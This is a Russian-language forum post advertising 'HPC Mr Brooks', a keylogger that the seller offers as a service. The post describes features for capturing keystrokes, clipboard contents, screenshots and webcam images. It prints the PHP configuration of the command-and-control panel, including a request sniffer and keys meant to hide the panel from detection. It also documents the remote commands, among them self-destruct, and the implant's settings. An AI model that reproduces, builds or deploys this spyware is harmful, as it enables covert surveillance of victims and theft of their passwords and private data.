1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

HPC Mr Brooks: Софт для мониторинга активности

Тема в разделе "Работа | Услуги", создана пользователем vladyxa13, 17 апр 2015.

  1. TopicStarter Overlay
    vladyxa13

    vladyxa13

    Регистрация:
    5 янв 2014
    Сообщения:
    9
    Симпатии:
    3
    HPC Mr Brooks

    Софт для мониторинга активности.

    Видеообзор

    [+] Пишет в лог нажатые клавиши, содержимое буфера обмена

    [+] Отсылаются скриншоты всего рабочего стола либо только активного окна. Так же можно установить ресайзинг разрешения скриншотов согласно заданной максимальной ширине.

    [+] Присылаются снимки с веб-камер (максимум 8 камер). Можно включать/отключать определенные камеры через консоль команд. Так же можно настраивать режим работы камер: отключать после каждого скриншота или держать камеру постоянно включенной.

    [+] Можно настраивать через консоль формат присылаемых изображений, это может быть BMP или JPG, черно-белые или цветные, так же можно настроить ресайзинг разрешения.

    [+] Используется deflate компрессинг. Сжимаются скриншоты и логи. В базе хранятся в сжатом виде.

    [+] С веб-панели можно задать команды и конфигурационные переменные.

    [+] Написан на C/C++. Модульная структура. Философия проекта: скорость, эффективность, использование минимум кода из сторонних библиотек.

    Проект представляет из себя веб-панель и exe. После запуска exe шпион регулярно присылает логи на веб-панель и заодно считывает передаваемые команды.

    01.03.2011
    Please login or register to view links

    01.07.2013
    После того как пропал 1nt нас несколько месяцев мучали мысли об этом проекте... насчет его доработки. У нас не остались исходники последнего ридера логов, но остались исходники основной части, то есть собственно екзешника кейлоггера.

    После довольно тщательных тестирований, изучения кода, была исправлена масса ошибок в системной части, в том числе критических ошибок, которые просто приводили к неработоспособности кейлоггера. Из некоторых улучшений и дополнений хочется отметить следующие. В старой версии если, к примеру, у юзера не было интернета и скопилось логов 50, то они не начинали отправляться пока не заполнится текущий лог. Теперь идет регулярная проверка, есть ли еще логи, и если есть, они отправляются вне зависимости от того, есть ли активность. Так же если размер лога не достиг определенного размера (10кб по дефолту) то лог не отправлялся, даже если набралось 9кб и компьютер весь день просто простаивал включенным. Теперь можно настроить чтобы через определенное время если лог превышает минимальный установленный порог он отправлялся, опять же вне зависимости от того есть ли сейчас активность. Да, и теперь кейлоггер поддерживает удаленные команды с админ-панели. Можно удаленно выставлять максимальный размер лога для отправки, минимальный размер, время после которого идет проверка на минимальный порог, ну а так же команду на остановку до перезагрузки и команду самоуничтожения.

    Да, и еще важная новость, ридер логов вместе с дотнетом теперь не нужны :) Теперь логи читаются непосредственно в панеле (присылаются они в кодировке UCS-2LE а преобразуются в UTF-8 при просмотре, так же можно скачать с панели оригинал). В файле lang.php можно добавить конфигурацию на любой язык, а символы, для которых не найдены совпадения, так же отображаются, просто в изначальном формате. Необходима поддержка на хостинге iconv.
    Please login or register to view links

    08.03.2015

    Итак, я решил далее заняться развитием проекта, и вот, наконец-то готова новая версия. Теперь софт отсылает скриншоты. В формате bmp или jpg. Используется deflate компрессинг, скриншоты в базе хранятся в сжатом виде. В веб-панеле так же немало новых нововведений, например Screenshots Monitor, а так же теперь есть консоль для отправки команд (то есть теперь их не нужно прописывать в конфигурационном файле).

    Новый видеообзор

    23.03.2015

    Готов модуль отправки изображений с веб-камер (максимум поддерживается 8 подключенных камер).

    В панеле так же есть функциональный онлайн-сниффер.

    Please login or register to view links

    Так же есть страницы для регулярной проверки на наличие новых записей со звуковым оповещением:

    Please login or register to view links

    Админ-панель гибко настраивается.

    PHP:
    <?php
    // HPC Command Center v.0.4
    // Coded by SokoL and HPC Team
    // HPC.name

    //////////////////////////////////////////////////////////
    // Данные для коннекта с DB
    $set['db_host'] = 'localhost';
    $set['db_user'] = 'user';
    $set['db_password'] = 'pass';
    $set['db_name'] = 'db';
    //////////////////////////////////////////////////////////
    // Настройки принятия логов

    $set['key'] = 'WFHMb0Fl56wGndLu9rqR6EtLNPnmIDlEtS2u3h7WCTCPWyk5F1'// ваш ключ
    $set['log_max_size'] = 1024*1024// максимальный размер загружаемого лога (в байтах), по дефолту 1мб (имеется в виду изначальный сжатый файл)
    $set['log_min_size'] = 10// минимальный размер загружаемого лога (в байтах), по дефолту 10 байт
    $set['log_auto_del'] = 0// автоматически удалять лог после открытия. 1 - да, 0 - нет
    $set['log_auto_del_get'] = 0// автоматически удалять лог после загрузки (в исходном виде, без парсинга). 1 - да, 0 - нет

    $rec_per_page 10// кол-во записей, отображаемых на 1 странице
    $del_on_one_page 30// сколько файлов удаляется при загрузке 1 страницы при выборе "удалить все файлы"
    $can_del_one_req 100// максимальное кол-во id, которое можно передать для удаления "за 1 присест" скрипту del_files.php
    $check_rec_time 15// время в секундах, которое по умолчанию ставится в форму при открытии скрипта check.php

    $set['main_page_show_mimg'] = 1// показывать ли миниатюры на главной странице просмотра логов
    $set['check_page_show_mimg'] = 1// показывать ли миниатюры на странице регулярной проверки новых записей
    $set['view_log_image_min'] = '-1'// максимальная ширина изображения (max-width) в пикселях или процентах при просмотре лога (либо, если здесь '-1', они будут в исходном размере отображены)
    $set['del_image_opened_in_sm'] = 0// удалять ли изображение после того как он будет открыт в Activity Monitor
    $set['del_image_opened'] = 0// удалять ли изображение после того как он будет открыт в логе или в Activity Monitor
    $set['activity_monitor_animation'] = 1// включить/отключить анимацию при смене изображений в Activity Monitor
    $set['activity_monitor_an_v'] = 300// значение в миллисекундах (длительность анимации)
    $set['image_viewed_mark'] = 0// отмечать в базе поле viewed, когда полноразмерное изображение открыто (для этого требуется дополнительный sql запрос). это позволит в последующем выполнить запрос на удаление всех просмотренных изображений
    $set['image_decr_when_del'] = 0// при удалении изображения уменьшать ли счетчик изображений в данных о логе (счетчик кол-ва всех изображений уменьшается и без этой опции).

    $mp3_name 'play.mp3'// имя mp3 файла, который воспроизводится на стр. check.php при поступлении новых записей (в каталоге статики)
    // обычно этот файл кэшируется, так что если заливаете новый поставьте новое имя
    $wait_if_new 10// сколько секунд оставляем страницу без перезагрузки если есть новая запись (при перезагрузке страницы воспроизведение аудио будет прервано)

    $ban_ip_on 0// включить фильтр по ip и подсетям
    $arr_ip_ban[] = ''// в этот массив можете добавлять ip (или подсети), с который запросы к gate.php будут игнорироваться

    //////////////////////////////////////////////////////////
    // Настройки сниффера
    $set['sniffer_on'] = 1// включен ли сниффер (0 - нет, 1 - да). рекомендуем переименовать файл s.php

    $sniff_max_rec 10000// если в логе будет больше чем указанное кол-во записей, то будет выполнено действие в зависимости от переменной $sniff_max_rec_do (0 для отключния данной проверки)
    $sniff_max_rec_do 0// 0 - если кол-во записей превышает $sniff_max_rec то удалять самую старую запись, если 1 - прекращать запись в лог.
    // внимание, если в базе уже записей больше чем $sniff_max_rec то записи все равно будут удаляться по одной на запрос

    $sniff_get_on 1// включить перехват GET запросов
    $sniff_post_on 1// включить перехват POST запросов
    $sniff_big_post_req 1// если POST запрос (key=value&key2=value2...) больше 2048 символов (utf8) он дописывается полностью в файл big_post.
    //а в post query пишется уведомление об этом.
    $sniff_post_dir_max_size 25*1024*1024// если размер каталога post больше указанного (в байтах, по дефолту 25мб), запись файла с post запросом производиться не будет, и будет добавлено сообщ. об этом в файл errors
    $sniff_big_post_size 100000// ограничить запись POST запросов в каталог post определенным значенм длины символов (utf8, то есть 2 байта на символ). 0 для снятия ограничения.
    $sniff_post_force 0// принудительно писать все POST запросы в файлы
    $sniff_post_preview 0// кол-во символов, до которых обрезается строка POST запроса, ЕСЛИ он пишется в файл. 0 для того чтоб убрать строку. НЕ ставьте значение больше 2000
    $sniff_mp3_name 'play.mp3'// имя mp3 файла, который воспроизводится на стр. check_sniffer.php при поступлении новых записей (в каталоге статики)
    $sniff_wait_if_new 35// сколько секунд оставляем страницу без перезагрузки если есть новая запись (при перезагрузке страницы воспроизведение аудио будет прервано)

    $sniff_redirect ''// выполнять редирект на указанный url (пустое значения для отключения)

    $sniff_set_mime_type 'image/gif'// mime-тип, который выдавать при отправке изображения (не хочется нагружать расширением Exif или gd для автоматического определения)
    // Например: image/gif, image/jpeg, image/png, audio/wav, font/ttf, text/html, text/plain, application/octet-stream, application/javascript
    // Как видите может быть не только изображение.
    // Сам файл выдается из каталога send. Если там больше одного файла, файл выбирается рандомно. будьте осторожны, не загружайте в этот каталог файлы котоые не хотите выдать юзеру.

    $sniff_auto_mime 1// автоматическое определение mime-типа на основе расширения файла (см. массив в include/mime.php). если не будет найдено соответствие будет выдан mime тип $sniff_set_mime_type

    $sniff_write_ip 1// записывать ip в лог
    $sniff_write_ip_r 0// записывать HTTP_X_FORWARDED_FOR в лог
    $sniff_write_agent 1// записывать agent
    $sniff_write_ref 1// записывать ref

    $sniffer_rec_per_page 10// кол-во записей, отображаемых на 1 странице
    $sniffer_del_on_one_page 30// сколько записей удаляется при загрузке 1 страницы при выборе "удалить все файлы"
    $sniffer_can_del_one_req 100// максимальное кол-во id, которое можно передать для удаления "за 1 присест" скрипту del_records.php
    $sniffer_check_rec_time 15// время в секундах, которое по умолчанию ставится в форму при открытии скрипта check_sniffer.php

    $sniffer_download_dialog 0// 1 - выдавать диалог загрузки файла с post-запросом, 0 - отображать в браузере (mime-тип text/plain)
    $sniffer_post_charset 'utf-8'// кодировка, которая ставится в заголовок charset при выдаче post-файла

    $sniff_ip_filter_on 0// включить фильтр по ip
    $arr_sniff_ip_ban[] = ''// в этот массив можете добавлять ip, с который запросы к снифферу будут игнорироваться
    $arr_sniff_ip_r_ban[] = ''// в этот массив можете добавлять ip (HTTP_X_FORWARDED_FOR), с который запросы к снифферу будут игнорироваться.

    //////////////////////////////////////////////////////////
    // Некоторые общие настройки

    $set['gmt'] = '+4:00'// смещение относительно GMT 0 (даты будут формироваться в соответствии с этим значением). соблюдайте именно этот формат (+/-NN:NN). значение по дефолту: +0:00

    $set['ip_check'] = 0// разрешать запросы к панели только с определенного айпи. 0 - отключить, 1 - включить
    $arr_ip_check[] = ''// массив в который можете добавлять айпи (или подсети) с которых разрешен доступ (только если включена опция $set['ip_check'])

    $set['internal_key_enable'] = 1// если здесь 1, то в случае если в адресе нету корректного значения key=value будет выдаваться 404 ошибка

    $set['internal_key'] = 'X5tQWNsXAjhM62sha4nzEGtxiqvH7D84hRteEBcpKjbqBuxBNA'// имя внутреннего ключа. внутренний ключ используется затруднения обнаружения панели. заходить в панель необходимо по адресу вида site.com/index.php?key=your_internal_key_here
    $set['internal_value'] = 'CEEsyQ17WvwxHUtY5pn0cY52gnOSuvrXaVpyMGUIcrgJlzHGFV'// значение, которое необходимо чтоб было у этого ключа. используется для затруднения обнаружения панели.
    // заходить в панель необходимо по адресу вида site.com/index.php?key=value где key это то что вы пропишете в $set['internal_key'] а value $set['internal_value']
    // Если ключ в GET запросе будет неправильный (речь идет не о всех скриптах) то вам будет выдан 404 error при запросе.

    $set['admin_login'] = 'admin_pIUKkbXYTrtkotf5ISkCBnUHWghEMM0c65MF6JDyaX9prEKZ8V'// логин
    $set['admin_pass'] = 'Cii7P@eCWJ#$yJt1pN^nU^tW%9HX6qmMVXM^3S$&yAaU1*#f7wO&Vgh^wvV0qo7'// пароль
    $set['password_md5'] = md5($set['admin_pass']);
    $set['admin_max_length'] = 300// максимально допустимая длина вводимого пароля

    $set['panel_www_dir'] = ''// www директория для панели, не ставьте / в конце, если заливаете в корень сайта оставьте значение ''
    $set['static_www_dir'] = '/staticM7S5XKBAUVD'// www директория для static файлов, подключаемых со скриптов. не ставьте / в конце
    $set['static_www_mimages'] = '/jW3GiUXWWjECYr5yiDMy2hzj7148WJ6gFYMNTKKQTz3SGXqPAc'// каталог внутри $set['static_www_dir'] (должны на него стоять права 777) в котором хранятся миниатюры изображений. в начале / обязательно ставьте

    $set['domain_in_cookies'] = ''// домен для кукисов, например .site.com для того чтобы куки читались на всех поддоменах данного домена. можете оставить поле пустым
    $set['path_in_cookies'] = '/'// путь в кукисах... данные настройки кукисов не влияют на кукисы, которые ставятся JavaScript'ом

    $set['del_all_cookies'] = 0// при logout'e удалять дополнительные куки, например hpc_cc_style

    // массив названия месяцев
    $arr_monthes = array(=> 'Jan'=> 'Feb'=> 'March'=> 'Apr'=> 'May'=> 'June'=> 'July'=> 'Aug'=> 'Sep'10 => 'Oct'11 => 'Nov'12 => 'Dec');

    ?>
    PHP:
    <?php
    // Конфиграции раскладок

    // системные номера раскладок

    // в exe используются следующие сокращения:
    /*
    67699721 - a (en)
    68748313 - b (ru)
    */

    $lang_name['a'] = 'en';
    $lang_name['b'] = 'ru';

    $lang_name['67568647'] = 'ru';
    $lang_name['-267910119'] = 'ru';
    ////////////////////////////////////////////////////////////////
    // EN

    /*
    формат:
    $lang['имя языка с массива $lang_name']['Символ с основного набора если шифт не зажат'] = 'символ'; $lang_shift['имя языка с массива $lang_name']['Символ с основного набора если шифт зажат'] = '!';

    Кейлоггер один символ представляет следующим образом:

    [67699721 0 W]

    где 67699721 - системный номер раскладки (может быть заменен 1 символом для сокращения размера лога)
    0 - нажат ли shift
    W - нажатая клавиша (из базового набора), которая затем переводится в сооветствии с предыдущими 2-ми параметрами собственно в клавишу которая отобразилась пользователю согласно его раскладке

    */

    $lang['en']['1'] = '1'$lang_shift['en']['1'] = '!';
    $lang['en']['2'] = '2'$lang_shift['en']['2'] = '@';
    $lang['en']['3'] = '3'$lang_shift['en']['3'] = '#';
    $lang['en']['4'] = '4'$lang_shift['en']['4'] = '$';
    $lang['en']['5'] = '5'$lang_shift['en']['5'] = '%';
    $lang['en']['6'] = '6'$lang_shift['en']['6'] = '^';
    $lang['en']['7'] = '7'$lang_shift['en']['7'] = '&';
    $lang['en']['8'] = '8'$lang_shift['en']['8'] = '*';
    $lang['en']['9'] = '9'$lang_shift['en']['9'] = '(';
    $lang['en']['0'] = '0'$lang_shift['en']['0'] = ')';
    $lang['en']['-'] = '-'$lang_shift['en']['-'] = '_';
    $lang['en']['+'] = '='$lang_shift['en']['+'] = '+';
    $lang['en']['Q'] = 'q'$lang_shift['en']['Q'] = 'Q';
    $lang['en']['W'] = 'w'$lang_shift['en']['W'] = 'W';
    $lang['en']['E'] = 'e'$lang_shift['en']['E'] = 'E';
    $lang['en']['R'] = 'r'$lang_shift['en']['R'] = 'R';
    $lang['en']['T'] = 't'$lang_shift['en']['T'] = 'T';
    $lang['en']['Y'] = 'y'$lang_shift['en']['Y'] = 'Y';
    $lang['en']['U'] = 'u'$lang_shift['en']['U'] = 'U';
    $lang['en']['I'] = 'i'$lang_shift['en']['I'] = 'I';
    $lang['en']['O'] = 'o'$lang_shift['en']['O'] = 'O';
    $lang['en']['P'] = 'p'$lang_shift['en']['P'] = 'P';
    $lang['en']['A'] = 'a'$lang_shift['en']['A'] = 'A';
    $lang['en']['S'] = 's'$lang_shift['en']['S'] = 'S';
    $lang['en']['D'] = 'd'$lang_shift['en']['D'] = 'D';
    $lang['en']['F'] = 'f'$lang_shift['en']['F'] = 'F';
    $lang['en']['G'] = 'g'$lang_shift['en']['G'] = 'G';
    $lang['en']['H'] = 'h'$lang_shift['en']['H'] = 'H';
    $lang['en']['J'] = 'j'$lang_shift['en']['J'] = 'J';
    $lang['en']['K'] = 'k'$lang_shift['en']['K'] = 'K';
    $lang['en']['L'] = 'l'$lang_shift['en']['L'] = 'L';
    $lang['en']['Z'] = 'z'$lang_shift['en']['Z'] = 'Z';
    $lang['en']['X'] = 'x'$lang_shift['en']['X'] = 'X';
    $lang['en']['C'] = 'c'$lang_shift['en']['C'] = 'C';
    $lang['en']['V'] = 'v'$lang_shift['en']['V'] = 'V';
    $lang['en']['B'] = 'b'$lang_shift['en']['B'] = 'B';
    $lang['en']['N'] = 'n'$lang_shift['en']['N'] = 'N';
    $lang['en']['M'] = 'm'$lang_shift['en']['M'] = 'M';
    $lang['en']['['] = '['$lang_shift['en']['['] = '{';
    $lang['en'][']'] = ']'$lang_shift['en'][']'] = '}';
    $lang['en']['\\'] = '\\'$lang_shift['en']['\\'] = '|';
    $lang['en'][';'] = ';'$lang_shift['en'][';'] = ':';
    $lang['en']['\''] = '\''$lang_shift['en']['\''] = '"';
    $lang['en'][','] = ','$lang_shift['en'][','] = '<';
    $lang['en']['.'] = '.'$lang_shift['en']['.'] = '>';
    $lang['en']['/'] = '/'$lang_shift['en']['/'] = '?';


    ////////////////////////////////////////////////////////////////
    // RU

    $lang['ru']['1'] = '1'$lang_shift['ru']['1'] = '!';
    $lang['ru']['2'] = '2'$lang_shift['ru']['2'] = '"';
    $lang['ru']['3'] = '3'$lang_shift['ru']['3'] = '№';
    $lang['ru']['4'] = '4'$lang_shift['ru']['4'] = ';';
    $lang['ru']['5'] = '5'$lang_shift['ru']['5'] = '%';
    $lang['ru']['6'] = '6'$lang_shift['ru']['6'] = ':';
    $lang['ru']['7'] = '7'$lang_shift['ru']['7'] = '?';
    $lang['ru']['8'] = '8'$lang_shift['ru']['8'] = '*';
    $lang['ru']['9'] = '9'$lang_shift['ru']['9'] = '(';
    $lang['ru']['0'] = '0'$lang_shift['ru']['0'] = ')';
    $lang['ru']['-'] = '-'$lang_shift['ru']['-'] = '_';
    $lang['ru']['+'] = '='$lang_shift['ru']['+'] = '+';
    $lang['ru']['Q'] = 'й'$lang_shift['ru']['Q'] = 'Й';
    $lang['ru']['W'] = 'ц'$lang_shift['ru']['W'] = 'Ц';
    $lang['ru']['E'] = 'у'$lang_shift['ru']['E'] = 'У';
    $lang['ru']['R'] = 'к'$lang_shift['ru']['R'] = 'К';
    $lang['ru']['T'] = 'е'$lang_shift['ru']['T'] = 'Е';
    $lang['ru']['Y'] = 'н'$lang_shift['ru']['Y'] = 'Н';
    $lang['ru']['U'] = 'г'$lang_shift['ru']['U'] = 'Г';
    $lang['ru']['I'] = 'ш'$lang_shift['ru']['I'] = 'Ш';
    $lang['ru']['O'] = 'щ'$lang_shift['ru']['O'] = 'Щ';
    $lang['ru']['P'] = 'з'$lang_shift['ru']['P'] = 'З';
    $lang['ru']['A'] = 'ф'$lang_shift['ru']['A'] = 'Ф';
    $lang['ru']['S'] = 'ы'$lang_shift['ru']['S'] = 'Ы';
    $lang['ru']['D'] = 'в'$lang_shift['ru']['D'] = 'В';
    $lang['ru']['F'] = 'а'$lang_shift['ru']['F'] = 'А';
    $lang['ru']['G'] = 'п'$lang_shift['ru']['G'] = 'П';
    $lang['ru']['H'] = 'р'$lang_shift['ru']['H'] = 'Р';
    $lang['ru']['J'] = 'о'$lang_shift['ru']['J'] = 'О';
    $lang['ru']['K'] = 'л'$lang_shift['ru']['K'] = 'Л';
    $lang['ru']['L'] = 'д'$lang_shift['ru']['L'] = 'Д';
    $lang['ru']['Z'] = 'я'$lang_shift['ru']['Z'] = 'Я';
    $lang['ru']['X'] = 'ч'$lang_shift['ru']['X'] = 'Ч';
    $lang['ru']['C'] = 'с'$lang_shift['ru']['C'] = 'С';
    $lang['ru']['V'] = 'м'$lang_shift['ru']['V'] = 'М';
    $lang['ru']['B'] = 'и'$lang_shift['ru']['B'] = 'И';
    $lang['ru']['N'] = 'т'$lang_shift['ru']['N'] = 'Т';
    $lang['ru']['M'] = 'ь'$lang_shift['ru']['M'] = 'Ь';
    $lang['ru']['['] = 'х'$lang_shift['ru']['['] = 'Х';
    $lang['ru'][']'] = 'ъ'$lang_shift['ru'][']'] = 'Ъ';
    $lang['ru']['\\'] = '\\'$lang_shift['ru']['\\'] = '/';
    $lang['ru'][';'] = 'ж'$lang_shift['ru'][';'] = 'Ж';
    $lang['ru']['\''] = 'э'$lang_shift['ru']['\''] = 'Э';
    $lang['ru'][','] = 'б'$lang_shift['ru'][','] = 'Б';
    $lang['ru']['.'] = 'ю'$lang_shift['ru']['.'] = 'Ю';
    $lang['ru']['/'] = '.'$lang_shift['ru']['/'] = ',';
    ////////////////////////////////////////////////////////////////

    ?>
    Команды передаются шпиону во время отправки лога. На сервере формируется последовательность байт согласно заданному формату и в зависимости от флага команды, передается либо один раз, либо каждый раз.

    Глобал команды всегда передаются каждый раз при запросе. Итак, в начале данной последовательности байт находится флаг, успешен ли запрос, далее идут команды, если они есть (например, команда на самоуничтожение), а затем идут конфигурационные параметры строго в определенном порядке. Данные конфигурационные параметры шпион сохраняет в в файле, так что при повторном запуске он заменяет ими настройки, вшитые изначально в exe.

    Когда exe запускается, он пишет в лог [Exe started] и дату запуска, и сразу отправляет лог, так что если вы некорректно сформулировали параметры и шпион не отсылал данные, после перезагрузки он отправит лог и считает новые параметры.

    Список команд консоли HPC Command Center

    set conf
    name=value
    name2=value2
    name3=value3


    Данная команда создаёт новую конфигурацию, либо изменяет параметры уже созданной ранее конфигурации. Допустимые переменные и значения читайте в в разделе [Variables]. Если какие-либо переменные не заполнены, они будут автоматически заполнены значениями по умолчанию.

    Для одного MAC адреса допускается одна конфигурация, и так же допускается одна глобал конфигурация. По умолчанию создается конфигурация, которая будет отправлена один раз (это не касается глобал конфигурации).
    Чтобы создать конфигурацию, которая будет отправляться каждый раз, вместо Set conf пишите Set conf flag=0. Соответственно можно писать Set conf flag=1 для конфигурации, которая будет отправлена один раз (но данное значение флага ставится по умолчанию). Если конфигурация изменяется, она будет отправлена снова, но опять же один раз после изменения (если не изменить данный флаг).
    В командах вместо "conf" можно писать "cnf"

    Если отправить данную команду без значений "параметр=значение", то соответственно переменные не будут изменены, но будет сброшен флаг cnf_sended.

    rm

    Команда на самоуничтожение.

    exit

    Данная команда завершит процесс. Но после перезагрузки exe будет вновь запущен.

    Обратите внимание, что в отличии от конфигурационных параметров, заданные команды отправляются только один раз, и в конфигурационной информации сохраняется команда только о последней введенной команде.
    Н
    апример, если вы задали команды exit, она будет отправлена один раз, вне зависимости от того какой флаг установлен для данной конфигурации. Для глобал конфигурации команда будет отправляться каждый раз при запросе.

    Отправлять команду так же можно комбинацией ctrl+enter.

    show conf

    Отображает конфигурацию, а так же различные данные, например дата, когда данная конфигурация была отправлена. Соответственно под полем ввода команды должен быть указан MAC адрес либо флаг глобал команды.

    Переменные/значения, которые отображает команда (если некоторые переменные не отображаются, это значит что они не установлены):

    cmd - команда, которая привязана к данной конфигурации<br>
    cmd_sended - boolean значение, была ли отправлена команда<br>
    cmd_time_upd - дата/время, когда была создана/изменена команда<br>
    cmd_time_sended - дата/время, когда была отправлена последняя созданная команда в данной конфигурации<br>
    cmd_main_id - айди лога, который был прислан, когда была отправлена данная команда. если cmd_sended равен 1, а это поле нулю, то это значит что команда была отправлена во время запроса, когда лог по каким-то причинам не был сохранен в базе (это же касается значения cnf_main_id).<br><br>

    count_sended - общее кол-во, сколько раз была отправлена данная конфигурация (включая отдельно отправленные команды)<br>
    cnf_sended - флаг, была ли отправлена конфигурация (значение сбрасывается при обновлении конфигурации, это же касается и cmd_sended)<br>
    cnf_flag - флаг кол-ва отправок конфигурации, который стоит в данной конфигурации (в global конфигурации значение данного флага не влияет на кол-во отправок)<br>
    cnf_time_upd - дата/время, когда была создана/обновлена<br><br>

    cnf_time_sended = дата/время, когда была отправлена конфигурация (когда конфигуация обновляется, этот счетчик не обнуляется, это касается и cmd_time_sended)<br>
    cnf_main_id - айди лога, который был прислан, когда была отправлена данная конфигурация<br><br>

    cnf_arr - массив переменных конфигурации и их значений<br><br>

    Обратите внимание, что в конфигурации могут быть не заданы конфигурационные параметры, но может быть команда (если конфигурация предварительно не была создана, а была сразу введена команда). Если вы хотите отправить следующую команду, убедитесь что флаг cmd_sended равен 1, иначе новая команда заменит собой предыдущую, которая так и не будет отправлена.

    del conf

    Команда удаляет заданную конфигурацию.

    reset conf

    Команда устанавливает все значения в конфигурации по умолчанию. Так же можно добавлять к команде flag=0 либо flag=1

    reset cmd

    Команда сбрасывает команду в заданной конфигурации, удаляя сопутствующие данные, относящиеся к данной команде (время создания и т.д.)
    Время - в секундах, размер - в байтах, если используются другие единицы изменения об этом сообщается в описании команды.
    boolean значения следует указывать только в числовом формате "0" либо "1"

    Многие опции, которые доступны для скриншотов, так же доступны и для снимков с камеры. Например, у опции scrsh_allow_size есть вариант webcam_allow_size.
    То есть заменяем scrsh на webcam. Для того чтобы посмотреть все доступные переменные введите после создания конфигурации show cnf.

    var name
    type
    default value
    description

    int
    log_max_size
    10240
    Когда лог превышает данный размер, он отправляется. НЕ ставьте здесь 0.

    int
    time_checklogminsize
    300
    Время в секундах с момента отправки последнего лога, по истечении которых шпион проверяет, не соответствует ли лог размеру log_max_size.
    Если соответствует, то отправляет лог. Если хотите отключить эту опция, поставьте "0"

    int
    log_min_size
    0
    Когда лог превышает данный размер (по умолчанию 10кб, минимальный 100 байт), отправляется. Для отключеня данной проверки поставьте "0"

    int
    log_max_size_new
    307200
    Если хотя бы раз не удалось отправить лог, то ставим этот максимальный размер, пока не возобновится связь (чтобы не накапливалось много мелких файлов логов). При этом будут регулярные попытки отправить лог.
    Обратите внимание, что партия скриншотов привязывается к логу, который в данный момент пишется, и отправляется только с ним (а до этого хранится в оперативке, естественно в сжатом виде). "0" для отключения опции

    int
    scrsh_allow_size
    1024*1024

    Фактически сколько занимают скриншоты в запросе к панели (без учета миниатюр). Когда скриншоты превышают данное значение, отправяется лог вместе с ними.
    Если указано 0, модуль скриншотов будет отключен, то есть они не будут делаться.
    В памяти хранится очередь скриншотов, размер которой максимм 100 элементов, то есть в 1 логе (в 1 запросе) может быть максимум 100 скриншотов

    int
    scrsh_max_count
    5

    Сколько максимально скриншотов передаём в 1 запросе. С миниатюрами получается число в 2 раза больше. Не рекомендуется ставить здесь значение более 10.
    Если заметите, что некоторые скриншоты не доходят, или не доходят некоторые миниатюры скриншотов (вполне вероятно что по причине ограничения php max_file_uploads, то соответственно уменьшите это значение.
    Если миниатюра доходит, а само изображение нет, то скрипт не допускает сохранение миниатюры. А вот если большое изображение приходит, а миниатюры нет в запросе, то большое изображение всё равно сохраняется.
    Если вы хотите чтобы скриншоты не делались, поставьте здесь 0. Внимание, для отключения скриншотов/снимков с вебки используйте именно эту переменную.

    boolean
    scrsh_sending_flag
    1

    Когда скриншоты будут занимать в памяти более чем значение scrsh_allow_size или их кол-во превысит scrsh_max_count, послужит ли это сигналом к отправке лога.

    boolean
    scrsh_only_active_w
    1

    Делать скриншоты только активного окна. 0 - делать скриншоты только всего рабочего стола. Если все окна свернуты, делается скриншот всего рабочего стола.

    int
    scrsh_fullscr_time
    180

    Через данные промежутки времени делать полноэкранный скриншот вместо активного окна (опция имеет смысл если scrsh_only_active_w=1). 0 для отключения.
    Если включаете этот таймер, указывайте не менее 5 секунд.

    int
    scrsh_force_bmp
    0

    0 - отключить
    1 - принудительно прислать в формате одно bmp изображение (цветное или нет, в зависимости от опции scrsh_colored)
    2 - отправить более 1 скриншота, если еще есть место согласно значению scrsh_allow_size
    Обратите внимание на опцию scrsh_allow_req_grow, она действует и в данном случае. scrsh_allow_size тоже действует

    boolean
    scrsh_compare
    0

    Включить/выключить сравнение скриншота с предыдущим (для этого требуется хранить предыдущий изначальный BMP скриншот в памяти). В случае если совпадает не более указанного кол-ва байт, не делаем новый скриншот.

    int
    scrsh_cb_maynoteq
    256

    Кол-во байт, которые могут не совпадать в предыдущем изображении, при этом новый скриншот делать не будем (позволяет учитывать "мигание курсора" при вводе текста и т.д.)

    boolean
    scrsh_colored
    0

    0 - скриншоты черно-белые, 1 - цветные

    boolean
    scrsh_allow_req_grow
    1

    Если новый скриншот в сумме с уже сделанными занимает более чем scrsh_allow_size, удалить его. Не рекомендуется ставить здесь 0, разве что если вам критичен размер запроса к серверу (особенно при включенной forcecoloredbmp)

    int
    scrsh_mini_maxw
    600

    Максимальная ширина миниатюрного скриншота. Новые размеры вычисляются делением на 2 высоты и ширины, пока ширина будет не более чем данное значение.
    Если исходный скриншот менее или равен данной ширине, миниатюра соответственно не делается. Для отключения миниатюр скриншотов поставьте здесь 0. Минимальное значение: 100.

    int
    scrsh_bmp_maxcompr_size
    138240

    Если размер сжатого 8-битного bmp превышает это значение, значит будем преобразовывать в jpg. Если здесь 0, то все черно-белые скриншоты будут конвертироваться в jpg.
    Бывает что черно-белый bmp весьма удачно сжимается, например, когда юзер находится в текстом редакторе, или читает википедию. В общем, как показали опыты, когда на скриншоте много текста и нету крупных изображений,
    то bmp отлично сжимается, иногда примерно до 40кб (а иногда и до 25кб, если довольно мало текста и много пространства, окрашенного в один цвет). А jpg наоборот, когда много текста весит больше, а когда юзер, например, на ютубе сморит видео на весь экран (в HD 1080p) то jpg скриншот (качество 60) получается
    менее 70кб (а далее в сжатом виде он еще меньше, но jpg сжимается не так эффективно как bmp). Так вот, а bmp черно-белый, когда юзер на ютубе, в сжатом виде весит около 550кб.
    наиболе весят и в сжатом bmp и jpg скриншоты, где есть не особо крупные изображения и текст, например, на главной странице ютуба где есть серия изображений, ведущих на видеоматериалы, и под ними надписи и т.д.
    Такие скриншоты в jpg могут быть около 200кб (качество 60).
    Эти данные приблизительные и основаны на сравнительно недолгих наблюдениях. Комбинируя качество jpg, опции когда следует отсылать в bmp а когда в jpg и т.д. можно достичь наиболее оптимальноых для вас результатов.

    int
    scrsh_clrbmp_maxcompr_size
    0

    Максимальный размер сжатого цветного bmp. Для разрешения 1920x1080 32 битный весит около 8мб, но
    бывало что сжимался примерно до 120кб (например когда открыт текстовый редактор). но эта проверка - дополнительная нагрузка на процессор, т.к. чтобы ее произвести, необходимо в начале сжать bmp (и если не подойдёт размер,
    затем сжимать еще раз уже в jpg формате). Если здесь указано 0, то все цветные bmp будут переконвертированы в jpg.

    int
    scrsh_mini_jpg_clr_q
    60

    Качество jpg миниатюрного скриншота цветного

    int
    scrsh_jpg_clr_q
    60

    Качество jpg большого цветного

    int
    scrsh_jpg_q
    60

    Качество jpg большого скриншота черно-белого

    int
    scrsh_mini_jpg_q
    60

    Качество jpg миниатюрного скриншота черно-белого

